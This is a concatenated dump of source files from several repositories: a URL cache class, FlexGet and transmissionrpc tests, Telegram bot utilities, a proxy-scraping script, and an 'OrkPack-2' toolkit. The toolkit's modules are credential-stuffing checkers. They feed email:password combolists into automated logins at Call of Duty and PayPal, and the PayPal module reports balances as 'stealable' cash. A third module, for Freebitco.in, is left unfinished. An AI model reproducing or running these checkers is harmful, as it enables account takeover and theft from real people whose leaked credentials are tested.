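A quick sanity check of the two URL helpers above, as a standalone sketch with expected outputs in the comments:
```python
# Quick sanity check of parseQmark/getRelative above.
print(parseQmark("http://example.com/page?id=3"))  # http://example.com/page
print(getRelative("http://example.com/a/b"))       # example.com
print(getRelative("example.com"))                  # example.com (no scheme, no slash)
```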
{
"source": "0x00-x/vulcan",
"score": 3
} |
#### File: vulcan/vulcan/Data.py
```python
class UrlData(object):
    '''URL object class'''
def __init__(self, url, html=None, depth=0):
self.url = url
self.html = html
self.depth = depth
self.params = {}
self.fragments = {}
self.post_data = {}
def __str__(self):
return self.url
def __repr__(self):
return '<Url data: %s>' % (self.url,)
def __hash__(self):
return hash(self.url)
class UrlCache(object):
    '''URL cache class'''
def __init__(self):
self.__url_cache = {}
def __len__(self):
return len(self.__url_cache)
def __contains__(self,url):
return hash(url) in self.__url_cache.keys()
def __iter__(self):
for url in self.__url_cache:
yield url
def insert(self,url):
if isinstance(url,basestring):
url = UrlData(url)
if url not in self.__url_cache:
self.__url_cache.setdefault(hash(url),url)
``` |
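A short usage sketch for the two classes above; single-argument `print()` calls keep it valid under the module's Python 2 (`basestring`) and Python 3 alike:
```python
# Usage sketch for UrlData/UrlCache above.
cache = UrlCache()
cache.insert("http://example.com/")            # plain strings are wrapped into UrlData
print(len(cache))                              # 1
print("http://example.com/" in cache)          # True: __contains__ matches on hash(url)
cache.insert(UrlData("http://example.com/", depth=1))
print(len(cache))                              # still 1: setdefault keeps the first entry
```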
{
"source": "0x022b/flexget-plugin-traits",
"score": 2
} |
#### File: flexget-plugin-traits/tests/test_example.py
```python
import pytest
from flexget.utils.qualities import QualityComponent
from typing import Generator
from typing import Tuple
from .utils import load_yaml_file
class QualityComponentMock(QualityComponent):
def __init__(self, type: str, value: int, name: str, regexp: str) -> None:
super().__init__(type, value, name, regexp)
self._raw_regexp = regexp
def __repr__(self) -> str:
return "<{}(value={},name={},regexp={})>".format(
self.type.title(), self.value, self.name, self._raw_regexp
)
def __str__(self) -> str:
return f"{self.name}"
class QualityTestPattern:
def __init__(self, type: str, name: str, pattern: str) -> None:
self.type = type
self.name = name
self.pattern = pattern
def __repr__(self) -> str:
return "<{}(name={},pattern={})>".format(
self.type.title(), self.name, self.pattern
)
def __str__(self) -> str:
return f"{self.pattern}"
def patterns() -> Generator[QualityTestPattern, None, None]:
content = load_yaml_file("tests/configuration.yaml")
for type, quality in content.get("patterns").items():
values = dict(content.get("defaults"))
for name, identifiers in quality.items():
for identifier in identifiers:
values[type] = identifier
for template in content.get("templates"):
if f"{{{type}}}" in template:
p = (
template.replace(".", " ")
.replace("-", "/")
.replace("{{audio}}", values["audio"])
.replace("{{codec}}", values["codec"])
.replace("{{color_range}}", values["color_range"])
.replace("{{resolution}}", values["resolution"])
.replace("{{source}}", values["source"])
)
yield QualityTestPattern(type, name, p.replace("/", " "))
p = p.replace("/", "-")
yield QualityTestPattern(type, name, p.replace(" ", "."))
yield QualityTestPattern(type, name, p.replace(" ", "-"))
def qualities() -> Generator[QualityComponentMock, None, None]:
content = load_yaml_file("examples/traits.yaml")
for type, quality in content["traits"].items():
for name, props in quality.items():
yield QualityComponentMock(
type, props.get("value", 0), name, props.get("regexp", name)
)
def quality_test_params() -> Generator[
Tuple[QualityComponentMock, QualityTestPattern], None, None
]:
for quality in qualities():
for pattern in patterns():
if quality.type == pattern.type:
yield (quality, pattern)
@pytest.mark.parametrize("quality, pattern", quality_test_params(), ids=str)
def test_quality(quality, pattern) -> None:
match = quality.regexp.search(pattern.pattern)
if quality.name == pattern.name:
assert match, f"'{quality}' should match '{pattern}'"
else:
assert not match, f"'{quality}' should not match '{pattern}'"
```
#### File: flexget-plugin-traits/tests/test_plugin.py
```python
import pytest
from flexget.utils import qualities
from flexget.utils.qualities import QualityComponent
from flexget.utils.qualities import Requirements
from jsonschema import Draft4Validator as validator
from typing import Any
from typing import Generator
from typing import List
from typing import Tuple
from .test_example import patterns
from .utils import load_yaml_file
from traits.traits import Traits
@pytest.fixture(scope="module")
def config() -> dict[str, Any]:
return load_yaml_file("examples/traits.yaml").get("traits")
def quality_asserts(
quality_components: dict[str, QualityComponent]
) -> Generator[Tuple[int, List[int]], None, None]:
for type, components in quality_components.items():
_qualities = [id(x) for x in getattr(qualities, f"_{type}s", [])]
for _id in [id(x) for x in components]:
yield (_id, _qualities)
@pytest.fixture(scope="module")
def task() -> Traits:
return Traits()
def test_on_task_start(task, config) -> None:
task.on_task_start(None, config)
for (original, current) in quality_asserts(task._original_qualities):
assert original not in current
@pytest.mark.parametrize("pattern", patterns(), ids=str)
def test_requirements_allows(pattern) -> None:
assert Requirements(pattern.name).allows(str(pattern))
def test_on_task_exit(task, config) -> None:
task.on_task_exit(None, config)
for (original, current) in quality_asserts(task._original_qualities):
assert original in current
def test_schema_definition(task, config) -> None:
validator.check_schema(task.schema)
validator(task.schema).validate(config)
``` |
{
"source": "0x022b/transmissionrpc",
"score": 3
} |
#### File: transmissionrpc/test/torrent.py
```python
import time
import datetime
import unittest
import transmissionrpc
import transmissionrpc.constants
import transmissionrpc.utils
from transmissionrpc.torrent import Torrent
class torrent(unittest.TestCase):
def assertPropertyException(self, exception, object, property):
try:
getattr(object, property)
except exception:
pass
else:
self.fail()
def testConstruction(self):
self.assertRaises(ValueError, Torrent, None, {})
Torrent(None, {"id": 42})
def testAttributes(self):
torrent = Torrent(None, {"id": 42})
self.assertTrue(hasattr(torrent, "id"))
self.assertEqual(torrent.id, 42)
self.assertPropertyException(KeyError, torrent, "status")
self.assertPropertyException(KeyError, torrent, "progress")
self.assertPropertyException(KeyError, torrent, "ratio")
self.assertPropertyException(KeyError, torrent, "eta")
self.assertPropertyException(KeyError, torrent, "date_active")
self.assertPropertyException(KeyError, torrent, "date_added")
self.assertPropertyException(KeyError, torrent, "date_started")
self.assertPropertyException(KeyError, torrent, "date_done")
self.assertRaises(KeyError, torrent.format_eta)
self.assertEqual(torrent.files(), {})
data = {
"id": 1,
"status": 4,
"sizeWhenDone": 1000,
"leftUntilDone": 500,
"uploadedEver": 1000,
"downloadedEver": 2000,
"uploadRatio": 0.5,
"eta": 3600,
"activityDate": time.mktime((2008, 12, 11, 11, 15, 30, 0, 0, -1)),
"addedDate": time.mktime((2008, 12, 11, 8, 5, 10, 0, 0, -1)),
"startDate": time.mktime((2008, 12, 11, 9, 10, 5, 0, 0, -1)),
"doneDate": time.mktime((2008, 12, 11, 10, 0, 15, 0, 0, -1)),
}
torrent = Torrent(None, data)
self.assertEqual(torrent.id, 1)
self.assertEqual(torrent.leftUntilDone, 500)
self.assertEqual(torrent.status, "downloading")
self.assertEqual(torrent.progress, 50.0)
self.assertEqual(torrent.ratio, 0.5)
self.assertEqual(torrent.eta, datetime.timedelta(seconds=3600))
self.assertEqual(
torrent.date_active, datetime.datetime(2008, 12, 11, 11, 15, 30)
)
self.assertEqual(torrent.date_added, datetime.datetime(2008, 12, 11, 8, 5, 10))
self.assertEqual(
torrent.date_started, datetime.datetime(2008, 12, 11, 9, 10, 5)
)
self.assertEqual(torrent.date_done, datetime.datetime(2008, 12, 11, 10, 0, 15))
self.assertEqual(
torrent.format_eta(), transmissionrpc.utils.format_timedelta(torrent.eta)
)
torrent = Torrent(None, {"id": 42, "eta": -1})
self.assertPropertyException(ValueError, torrent, "eta")
data = {
"id": 1,
"status": 4,
"sizeWhenDone": 1000,
"leftUntilDone": 500,
"uploadedEver": 1000,
"downloadedEver": 2000,
"uploadRatio": 0.5,
"eta": 3600,
"activityDate": time.mktime((2008, 12, 11, 11, 15, 30, 0, 0, -1)),
"addedDate": time.mktime((2008, 12, 11, 8, 5, 10, 0, 0, -1)),
"startDate": time.mktime((2008, 12, 11, 9, 10, 5, 0, 0, -1)),
"doneDate": 0,
}
torrent = Torrent(None, data)
self.assertEqual(torrent.date_done, None)
def testUnicode(self):
torrent = Torrent(None, {"id": 42, "name": "あみ"})
self.assertEqual(torrent.id, 42)
repr(torrent)
str(torrent)
def suite():
suite = unittest.TestLoader().loadTestsFromTestCase(torrent)
return suite
``` |
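The `progress == 50.0` assertion above follows from `sizeWhenDone=1000` and `leftUntilDone=500`; a sketch of the arithmetic Torrent presumably performs internally:
```python
# How the asserted progress of 50.0 presumably derives from the fixture data
# (a sketch of the arithmetic, not transmissionrpc's actual implementation).
size_when_done, left_until_done = 1000, 500
progress = 100.0 * (size_when_done - left_until_done) / size_when_done
print(progress)  # 50.0
```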
{
"source": "0x06060606/OrkPack-2",
"score": 3
} |
#### File: 0x06060606/OrkPack-2/Main.py
```python
import os, sys
Modules = ["Checkers", "Tools"]
for root, dirs, files in os.walk("./Modules"):
for filename in files:
Modules.append(filename[:-3])
def runModule(ModuleCC):
ModulePath = "./Menus/" + ModuleCC + ".py"
os.system("python3 " + ModulePath)
def MainMenu():
os.system('cls' if os.name=='nt' else 'clear')
print(" Welcome to _CheckTheDeck_! ")
print(" This tool was supplied by @OrkSec ")
print(" And Revamped by @0x06060606 ")
print(" What Menu would you like to enter? ")
for index, value in enumerate(Modules):
print(" [" + str(index) + "]" , value)
print(" [" + str(len(Modules)) + "]" , "Exit ")
choice = input(" ==> ")
if int(choice) == int(len(Modules)):
exit()
if int(choice) <= len(Modules):
runModule(Modules[int(choice)])
else:
MainMenu()
try:
MainMenu()
except ValueError:
os.system("python3 " + sys.argv[0])
except KeyboardInterrupt:
exit()
```
#### File: Menus/Modules/CallOfDuty.com.py
```python
import os, requests, re, time, json
from selenium import webdriver
from selenium.webdriver.firefox.options import Options
from bs4 import BeautifulSoup
options = Options()
options.set_headless(headless=True)
class bcolors:
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
def login(username, password):
driver = webdriver.Firefox(firefox_options=options)
driver.get("https://profile.callofduty.com/cod/login")
driver.find_element_by_xpath("//input[@id='username']").send_keys(username)
driver.find_element_by_xpath("//input[@id='password']").send_keys(password)
driver.find_element_by_xpath("//button[@id='login-button']").click()
driver.get("https://my.callofduty.com/de/player/combatrecord")
    driver.refresh()
elements=driver.find_elements_by_xpath("//div[@class='stats-header']/h2[@class='heading']")
if not elements:
NotExistent=driver.find_elements_by_xpath("//div[@class='no-gameplay-found']/h1")
if not NotExistent:
print(bcolors.FAIL + " [X] " + username + ":" + password + " | Login wrong." + bcolors.ENDC)
# driver.close()
else:
hasGames = False
print(bcolors.WARNING + " [X] " + username + ":" + password + " | Has never played before." + bcolors.ENDC)
driver.close()
else:
hasGames = True
        KD = driver.find_element_by_xpath("/html[@class='wf-opensans-n3-active wf-opensans-n7-active wf-montserrat-n4-active wf-opensanscondensed-n3-active wf-opensanscondensed-n7-active wf-opensans-n4-active wf-active']/body[@class='with-sso-bar desktop sso-logged-in sso-auth-known']/div[@class='page-content-container']/div[@class='page-content parsys']/div[@class='atvi-component atvi-content-tile ignore-id template ']/div[@id='mycod']/div[@id='app']/main[@class='main-content']/div[@class='dashboard-page-new main-content-inner inner-wrapper bo4']/section[@class='weekly-stats item']/div[@class='chart-wrap']/div[@class='weekly-stats__inner']/div[@class='StatProgressCircle bo4']/div[@class='StatProgressCircle__stats']/span[@class='value']").text  # find_element (singular) and .text: find_elements returns a list
print(bcolors.OKGREEN + " [O] " + username + ":" + password + " | Has a KD Ratio of " + KD + bcolors.ENDC)
element = elements[0]
driver.close()
def storeArray(combolistin):
with open(combolistin.replace(" ", ""), 'r') as myfile:
for line in myfile:
line = line.replace('\n', '')
email = line.split(":")[0]
password = line.split(":")[1]
login(email, password)
def askForCombo():
print(" Please drag and drop a email:password combolist. ")
combolistFullPath = input(" ==> ")
storeArray(combolistFullPath)
try:
os.system('cls' if os.name=='nt' else 'clear')
print(" Welcome to the " + os.path.basename(__file__)[:-3] + " Checker! ")
askForCombo()
except KeyboardInterrupt:
exit()
```
#### File: Menus/Modules/Freebitco.in.py
```python
import requests, webbrowser, os, sys, time, inspect, json, re
url = "https://home.nest.com/session"
class bcolors:
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
def welcome():
os.system('cls' if os.name=='nt' else 'clear')
print(" Welcome to the " + os.path.basename(__file__)[:-3] + " Checker! ")
importCombolist()
def importCombolist():
print(" Please drag and drop a combolist here. ")
combolistPath = input(' ==> ')
with open(combolistPath.replace(" ", ""), 'r') as myfile:
for line in myfile:
payload = 0
line = line.replace('\n', '')
email = line.split(":")[0]
password = line.split(":")[1]
payload = {'email': email, 'password': password}
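            # NOTE: the original script stops here -- a payload is built for
            # each line but never POSTed to `url`; the login request itself is
            # left unimplemented.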
try:
welcome()
except KeyboardInterrupt:
exit()
```
#### File: Menus/Modules/Paypal.com.py
```python
import requests, re, time, os, sys, json, time
from selenium import webdriver
from selenium.webdriver.firefox.options import Options
from bs4 import BeautifulSoup
import speech_recognition as sr
options = Options()
options.set_headless(headless=False)
CURSOR_UP_ONE = '\x1b[0A'
ERASE_LINE = '\x1b[lol'
class bcolors:
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
r = sr.Recognizer()
delay = 10
def countdown(t):
while t:
mins, secs = divmod(t, 60)
timeformat = '{:02d}:{:02d}'.format(mins, secs)
sys.stdout.write("\r Waiting " + timeformat + " Seconds Before the next login... ")
sys.stdout.flush()
time.sleep(1)
t -= 1
sys.stdout.write(CURSOR_UP_ONE)
sys.stdout.write("\n")
sys.stdout.flush()
def login(username, password):
time.sleep(10)
driver = webdriver.Firefox(firefox_options=options)
driver.get("https://www.paypal.com/us/signin")
driver.find_element_by_xpath("//input[@id='email']").send_keys(username)
driver.find_element_by_xpath("//button[@id='btnNext']").click()
time.sleep(5.6543)
driver.find_element_by_xpath("//input[@id='password']").send_keys(password)
driver.find_element_by_xpath("//button[@id='btnLogin']").click()
driver.get("https://www.paypal.com/myaccount/summary/")
elements=driver.find_elements_by_xpath("//span[@class='vx_text-1 cw_tile-currency test_balance-tile-currency']")
if not elements:
        print(bcolors.FAIL + " [X] " + username + ":" + password + "\t | No Amount stealable lol. No Span found " + bcolors.ENDC)
driver.close()
else:
        cashValue = elements[0].text  # find_elements returns a list; reuse the first match
print(bcolors.OKGREEN + " [YAY] " + username + ":" + password + " | Found some cash! Amount we found: (" + cashValue + ") " + bcolors.ENDC)
driver.close()
def storeArray(combolistin):
print(" We will wait "+str(delay)+" Seconds between every check! ")
with open(combolistin.replace(" ", ""), 'r') as myfile:
for line in myfile:
line = line.replace('\n', '')
email = line.split(":")[0]
password = line.split(":")[1]
login(email, password)
def askForCombo():
print(" Please drag and drop a email:password combolist. ")
combolistFullPath = input(" ==> ")
storeArray(combolistFullPath)
try:
os.system('cls' if os.name=='nt' else 'clear')
print(" Welcome to the " + os.path.basename(__file__)[:-3] + " Checker! ")
askForCombo()
except KeyboardInterrupt:
exit()
``` |
{
"source": "0x06060606/Soteria_Proxy-Scraper",
"score": 2
} |
#### File: 0x06060606/Soteria_Proxy-Scraper/index.py
```python
import json, requests, sys
import socket, urllib3, time
import os, random, threading
from time import time as tom
cnt=(0)
ping=(0)
count=(0)
threads=(0)
working=(0)
loop=(True)
debugg=(False)
not_working=(0)
key=('Test-Key')
types=(['http','https','socks4','socks5'])
headers=({'Content-Type': 'application/json', 'Authorization': '{0}'.format(key)})
def debug(msg):
global debugg
if debugg:
print(" [!] Debug >> "+str(msg))
try:
if sys.argv[1]:
maxThreads=(int(sys.argv[1]))
else:
maxThreads=(10)
except Exception as e:
debug(e)
maxThreads=(10)
with open("errors.dat", "a+") as f:
f.write(str('No_Arg_MaxThreads'))
f.write("\n")
try:
if sys.argv[2]:
perThread=(int(sys.argv[2]))
else:
perThread=(1)
except Exception as e:
debug(e)
perThread=(1)
with open("errors.dat", "a+") as f:
f.write(str('No_Arg_PerThread'))
f.write("\n")
try:
if sys.argv[3]:
if int(sys.argv[3])==1:
debugg=(True)
else:
debugg=(False)
else:
debugg=(False)
except Exception as e:
debug(e)
debugg=(False)
def getProxy(proxType):
debug(proxType)
api_url=('{0}{1}'.format("https://proxy.soteria.cf/", proxType))
response=(requests.get(api_url, headers=headers))
if response.status_code == 200:
proxy=(json.loads(response.content.decode('utf-8')))
debug(proxy)
return proxy
else:
debug(json.loads(response.content.decode('utf-8')))
return None
def check(proxy, proxType, url):
global ping, working, not_working
try:
bef=(tom())
requests.get(url,proxies={''+proxType:proxType+'://'+proxy},timeout=(2,5))
aft=(tom())
ping=(str(aft-bef))
working+=(1)
if timeSinceLastRun < 300:
with open(str(proxType)+".dat", "a+") as f:
f.write(proxy)
debug(proxy)
f.write("\n")
else:
with open(str(proxType)+".dat", "w") as f:
f.write(proxy)
debug(proxy)
f.write("\n")
return "Working!"
except Exception as e:
debug(e)
not_working+=(1)
aft=(tom())
ping=(str(aft-bef))
if ('ConnectionPool' in str(e) or 'BadStatusLine' in str(e)):
pass
else:
with open("errors.dat", "a+") as f:
f.write(str(e))
f.write("\n")
pass
return "Not Working!"
def cleanDupes(Type):
try:
uniqlines=(set(open(str(Type)+".dat").readlines()))
out=(open(str(Type)+".temp.dat", 'w').writelines(uniqlines))
with open(str(Type)+".temp.dat", "r") as f:
out=(open(str(Type)+".dat", 'w').writelines(f.readlines()))
os.remove(str(Type)+".temp.dat")
except Exception as e:
debug(e)
with open("errors.dat", "a+") as f:
f.write(str(e))
f.write("\n")
def run(n):
global cnt, count, perThread, ping
try:
p=(0)
while (p < perThread):
magic=(random.randint(1,4))
if (magic==1):
try:
count+=(1)
http=(getProxy('http'))
print(" [Thread-"+str(n)+"] HTTP = "+http[0]+":"+http[1]+" | "+str(check(http[0]+":"+http[1],'http',"http://www.google.com/"))+" | "+str(ping)+" ")
except Exception as e:
debug(e)
print(" [Thread-"+str(n)+"] HTTP = Malformed Proxy Error ")
if (magic==2):
try:
count+=(1)
https=(getProxy('https'))
print(" [Thread-"+str(n)+"] HTTPS = "+https[0]+":"+https[1]+" | "+str(check(https[0]+":"+https[1],'https',"https://www.google.com/"))+" | "+str(ping)+" ")
except Exception as e:
debug(e)
print(" [Thread-"+str(n)+"] HTTPS = Malformed Proxy Error ")
if (magic==3):
try:
count+=(1)
socks4=(getProxy('socks4'))
print(" [Thread-"+str(n)+"] Socks4 = "+socks4[0]+":"+socks4[1]+" | "+str(check(socks4[0]+":"+socks4[1],'socks4',"https://www.google.com/"))+" | "+str(ping)+" ")
except Exception as e:
debug(e)
print(" [Thread-"+str(n)+"] Socks4 = Malformed Proxy Error ")
if (magic==4):
try:
count+=(1)
socks5=(getProxy('socks5'))
print(" [Thread-"+str(n)+"] Socks5 = "+socks5[0]+":"+socks5[1]+" | "+str(check(socks5[0]+":"+socks5[1],'socks5',"https://www.google.com/"))+" | "+str(ping)+" ")
except Exception as e:
debug(e)
print(" [Thread-"+str(n)+"] Socks5 = Malformed Proxy Error ")
p+=(1)
else:
debug('Thread '+str(n)+' Done!')
cnt+=(1)
return
except KeyboardInterrupt:
return
except Exception as e:
debug(e)
with open("errors.dat", "a+") as f:
f.write(str(e))
f.write("\n")
def finish():
global cnt, working, loop, not_working, befTime, count, types
try:
while (loop):
while (cnt == maxThreads):
for typ in types:
cleanDupes(typ)
with open("time.dat", "w") as f:
f.write(str(tom()))
if (count==not_working+working):
aftTime=(tom())
print(" \r\n")
print(" [#] Finished Proxy API Scraping in "+str(aftTime-befTime)+" ")
print(" [#] "+str(working)+" working and "+str(not_working)+" not working ")
print(" [#] out of "+str(not_working+working)+" tested! ")
print("\r\n ")
cnt+=(1)
loop=(False)
else:
aftTime=(tom())
print(" \r\n")
print(" [!] Minimal Error Found in Memory! {"+str(count)+":"+str(cnt)+"} ")
print(" [#] Finished Proxy API Scraping in "+str(aftTime-befTime)+" ")
print(" [#] "+str(working)+" working and "+str(not_working)+" not working ")
print(" [#] out of "+str(not_working+working)+" tested! ")
print("\r\n ")
cnt+=(1)
loop=(False)
return
else:
pass
except KeyboardInterrupt:
return
except Exception as e:
debug(e)
with open("errors.dat", "a+") as f:
f.write(str(e))
f.write("\n")
if __name__ == "__main__":
try:
os.system('cls' if os.name=='nt' else 'clear')
print("""\r\n\
____ _ _
/ ___| ___ | |_ ___ _ __(_) __ _
\___ \ / _ \| __/ _ \ '__| |/ _` |
___) | (_) | || __/ | | | (_| |
|____/ \___/ \__\___|_| |_|\__,_|""")
print("\n\r [2.0] \r\n ")
with open("time.dat", "r") as f:
timeSinceLastRun=(int(tom())-int(float(f.read())))
debug(timeSinceLastRun)
print(" [#] Starting Proxy API Scraping... (ctrl+c to stop) ")
print(" \r\n")
while (threads < maxThreads):
befTime=(tom())
threading.Thread(target=run, args=(threads,)).start()
debug(threads)
threads+=(1)
else:
threading.Thread(target=finish).start()
            exit()
except KeyboardInterrupt:
loop=(False)
print(" \r\n")
print(" [#] Force Stopped Proxy API Scraping! ")
print(" [#] "+str(working)+" working and "+str(not_working)+" not working ")
print(" [#] out of "+str(not_working+working)+" tested! ")
print("\r\n ")
        exit()
except Exception as e:
debug(e)
with open("errors.dat", "a+") as f:
f.write(str(e))
f.write("\n")
``` |
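For reference, the `timeout=(2, 5)` tuple passed to `requests.get` in `check()` is requests' (connect, read) timeout pair; a minimal standalone version of the same probe, with a hypothetical proxy address:
```python
# Minimal standalone version of the proxy probe in check() above.
# The proxy address is hypothetical; (2, 5) = (connect, read) timeouts.
import time
import requests

proxy = "127.0.0.1:8080"
start = time.time()
try:
    requests.get("http://www.google.com/",
                 proxies={"http": "http://" + proxy},
                 timeout=(2, 5))
    print("Working! %.2fs" % (time.time() - start))
except Exception as err:
    print("Not Working! %s" % err)
```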
{
"source": "0x09AL/appcompatprocessor",
"score": 2
} |
#### File: appcompatprocessor/Ingest/amcache_raw_hive.py
```python
import settings
import logging
import struct
from ingest import Ingest
from appAux import loadFile
import pyregf
from AmCacheParser import _processAmCacheFile_StringIO
import settings
import ntpath
from amcache_miracquisition import Amcache_miracquisition
logger = logging.getLogger(__name__)
# Module to ingest AmCache data
# File extension must be '.hve'
# Hostname = File name
# Note: Exactly the same as amcache_miracquisition with a different file_name_filter
class Amcache_Raw_hive(Ingest):
ingest_type = "amcache_raw_hive"
file_name_filter = "(?:.*)(?:\/|\\\)(.*)\.hve$"
def __init__(self):
super(Amcache_Raw_hive, self).__init__()
def getHostName(self, file_name_fullpath):
if not settings.__PYREGF__:
logger.warning("AmCache processing disabled (missing pyregf) skipping file: %s" % file_name_fullpath)
else: return super(Amcache_Raw_hive, self).getHostName(file_name_fullpath)
def checkMagic(self, file_name_fullpath):
magic_ok = False
# Quick and dirty check
file_object = loadFile(file_name_fullpath)
tmp = struct.unpack( '4s' , file_object.read(4) )
if tmp[0] == "regf":
# Perform a deeper check using pyregf
regf_file = pyregf.file()
regf_file.open_file_object(file_object, "r")
magic_key = regf_file.get_key_by_path(r'Root\File')
regf_file.close()
del regf_file
if magic_key is not None:
magic_ok = True
file_object.close()
del file_object
return magic_ok
def calculateID(self, file_name_fullpath):
instanceID = None
file_object = loadFile(file_name_fullpath)
regf_file = pyregf.file()
regf_file.open_file_object(file_object, "r")
tmp = regf_file.get_key_by_path(r'Root\File')
        if tmp is None:
logger.warning("Not an AmCache hive! [%s]" % file_name_fullpath)
else:
instanceID = regf_file.root_key.last_written_time
# Need to close these or the memory will never get freed:
regf_file.close()
del regf_file
file_object.close()
del file_object
return instanceID
def processFile(self, file_fullpath, hostID, instanceID, rowsData):
rowNumber = 0
file_object = loadFile(file_fullpath)
rows = _processAmCacheFile_StringIO(file_object)
file_object.close()
for r in rows:
namedrow = settings.EntriesFields(HostID = hostID, EntryType = settings.__AMCACHE__, RowNumber = rowNumber,
FilePath = (None if r.path == None else ntpath.dirname(r.path)), FileName = (None if r.path == None else ntpath.basename(r.path)),
Size = r.size, ExecFlag = 'True', SHA1 = (None if r.sha1 == None else r.sha1[4:]),
FileDescription = r.file_description, FirstRun = r.first_run, Created = r.created_timestamp, Modified1 = r.modified_timestamp,
Modified2 = r.modified_timestamp2, LinkerTS = r.linker_timestamp, Product = r.product, Company = r.company,
PE_sizeofimage = r.pe_sizeofimage, Version_number = r.version_number, Version = r.version, Language = r.language,
Header_hash = r.header_hash, PE_checksum = r.pe_checksum, SwitchBackContext = r.switchbackcontext, InstanceID = instanceID)
rowsData.append(namedrow)
rowNumber += 1
``` |
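The `file_name_filter` regex above captures the hostname from any path ending in `.hve`; a quick standalone illustration of that capture group:
```python
# Standalone illustration of the hostname capture in file_name_filter above.
import re

pattern = r"(?:.*)(?:\/|\\)(.*)\.hve$"        # same pattern, written as a raw string
m = re.match(pattern, r"C:\acquisitions\HOST01.hve")
print(m.group(1))                             # HOST01
m = re.match(pattern, "/evidence/host02.hve")
print(m.group(1))                             # host02
```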
{
"source": "0x0bloodyknight/jdan734-bot",
"score": 3
} |
#### File: config/lib/driver.py
```python
from aiovk.drivers import BaseDriver
import aiohttp
class HttpDriver(BaseDriver):
def __init__(self, timeout=10, loop=None, session=None):
super().__init__(timeout, loop)
async def post_json(self, url, params, timeout=None):
async with aiohttp.ClientSession() as session:
async with session.post(url, data=params, timeout=timeout or self.timeout) as response:
return response.status, await response.json()
async def get_bin(self, url, params, timeout=None):
async with aiohttp.ClientSession() as session:
async with session.get(url, data=params, timeout=timeout or self.timeout) as response:
return response.status, await response.read()
async def get_text(self, url, params, timeout=None):
async with aiohttp.ClientSession() as session:
async with session.get(url, data=params, timeout=timeout or self.timeout) as response:
return response.status, await response.text(), response.real_url
async def post_text(self, url, data, timeout=None):
async with aiohttp.ClientSession() as session:
async with session.post(url, data=data, timeout=timeout or self.timeout) as response:
return response.status, await response.text(), response.real_url
async def close(self):
await self.session.close()
```
#### File: config/lib/filters.py
```python
import asyncio
import logging
from .text import code
from ..bot import bot
class ResendLogs(logging.Filter):
def filter(self, record):
loop = asyncio.get_event_loop()
loop.create_task(self.send_to_tg(record))
return True
async def send_to_tg(self, record):
await bot.send_message(-1001435542296, code(record.msg),
parse_mode="HTML")
class NoRunningJobFilter(logging.Filter):
def filter(self, record):
return not record.getMessage().startswith("Running job Every")
```
#### File: config/lib/middleware.py
```python
import os
import yaml
import i18n
from .text import fixHTML
from aiogram.contrib.middlewares.i18n import I18nMiddleware as I18nMiddlewareBase
class I18nMiddleware(I18nMiddlewareBase):
def t(self, singular, plural=None, n=1, locale=None,
enable_patch=False, prepare_kwargs=False, **kwargs):
self.i18n = i18n
self.i18n.load_path.append(self.path)
res = self.gettext(singular, plural, n, locale)
lang = self.ctx_locale.get()
lang = self.default if lang is None else lang
lang = "uk" if lang == "ua" else lang
self.i18n.set("locale", lang)
self.i18n.set("fallback", self.default)
if prepare_kwargs:
for arg in kwargs:
kwargs[arg] = fixHTML(kwargs[arg])
try:
if enable_patch:
raise TypeError
return self.i18n.t(res, **kwargs)
except TypeError:
path = f"{self.path}/{res.split('.')[0]}.{{lang}}.yml"
if not os.path.exists(path.format(lang=lang)):
lang = self.default
with open(path.format(lang=lang),
encoding="UTF-8") as f:
locale = yaml.safe_load(f.read())
translate = locale.get(lang).get(res.split(".")[1])
if isinstance(translate, str):
return translate
return [_.format(**kwargs) if isinstance(_, list) else _
for _ in translate]
```
#### File: bot/dev/crypto.py
```python
import hashlib
from random import choice
from ..config import dp, _
from ..lib import handlers
from ..lib.text import code
@dp.message_handler(commands=["sha256"])
@handlers.get_text
async def sha256(message, text):
text = bytearray(text.encode("utf-8"))
crypt = hashlib.sha256(text).hexdigest()
await message.reply(crypt)
@dp.message_handler(commands=["generate_password", "password"])
@handlers.parse_arguments(2)
async def password(message, options):
try:
password_len = int(options[1])
except ValueError:
await message.reply(_("error.pass_len_required"))
return
if password_len > 4096:
await message.reply(_("errors.message_len"),
parse_mode="Markdown")
return
elif password_len < 6:
await message.reply(_("errors.pass_crypt_is_low"),
parse_mode="Markdown")
return
password = ""
symbols = []
symbols.extend(list("abcdefghijklmnopqrstuvwxyz"))
symbols.extend(list("abcdefghijklmnopqrstuvwxyz".upper()))
symbols.extend(list('~!@#$%^&*()_+-=`[]\\}{|;\':"<>,./?'))
symbols.extend(list("0123456789"))
for __ in range(0, password_len):
password += choice(symbols)
await message.reply(code(password), parse_mode="HTML")
```
#### File: bot/dev/text.py
```python
from ..config import dp
from ..lib import handlers
@dp.message_handler(commands=["title"])
@handlers.get_text
async def title(message, text):
await message.reply(text.title())
@dp.message_handler(commands=["upper"])
@handlers.get_text
async def upper(message, text):
await message.reply(text.upper())
@dp.message_handler(commands=["lower"])
@handlers.get_text
async def lower(message, text):
await message.reply(text.lower())
@dp.message_handler(commands=["markdown"])
@handlers.get_text
async def markdown(message, text):
await message.reply(text, parse_mode="Markdown")
```
#### File: bot/lib/convert_bytes.py
```python
def convert_bytes(num):
for x in ['bytes', 'KB', 'MB', 'GB', 'TB']:
if num < 1024.0:
return f"{round(num, 2)} {x}"
num /= 1024.0
```
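A quick check of the helper above, with expected outputs in the comments:
```python
# Quick check of convert_bytes (expected outputs in the comments).
print(convert_bytes(512))            # 512 bytes
print(convert_bytes(2048))           # 2.0 KB
print(convert_bytes(5 * 1024**3))    # 5.0 GB
```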
#### File: bot/lib/libtree.py
```python
from aiogram.utils import json
# tree-drawing characters
TAB = " "
MIDDLE_ITEM = "├"
END_ITEM = "└"
NO_ITEM = "│"
ITEM = "─"
def iter_last(iterable):
iterable = iter(iterable)
try:
p = next(iterable)
except StopIteration:
return False
for i in iterable:
yield p, False
p = i
yield p, True
def make_tree(d, title="root", default_line="") -> str:
lines = list()
lines.append(title)
